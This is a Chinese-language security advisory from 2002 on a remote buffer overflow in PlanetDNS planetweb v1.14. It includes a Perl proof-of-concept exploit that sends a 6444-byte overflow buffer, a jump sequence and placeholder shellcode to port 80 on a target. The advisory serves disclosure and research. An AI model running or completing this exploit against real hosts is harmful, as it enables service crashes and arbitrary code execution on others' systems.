planetDNS远程缓冲区溢出漏洞
发布日期:2002-10-17
更新日期:2002-10-21
受影响系统:PlanetDNS plaetweb v1.14
描述:
planetdns是一款商业程序允许用户即使只有动态IP地址的情况下在自己电脑上建立WEB、FTP、邮件等服务器。
planetdns对用户超长请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以planetdns进程权限在系统上执行任意指令。
攻击者向planetdns服务程序发送多个1024字节请求可导致服务崩溃,而不使用'GET /'发送6500个字节可以覆盖堆栈中的EIP地址,精心构建提交数据可能以planetdns进程权限在系统上执行任意指令。
<*来源:securma massine (
securma@caramail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103486987122111&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
securma massine(
securma@caramail.com) 提供了如下测试程序:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
christal...plus tu pédales moins fort, moins tu #avances
plus vite..)
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx
= eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with
(jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
建议:
厂商补丁:
PlanetDNS
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.planetdns.net/浏览次数:4302
严重程度:0(网友投票)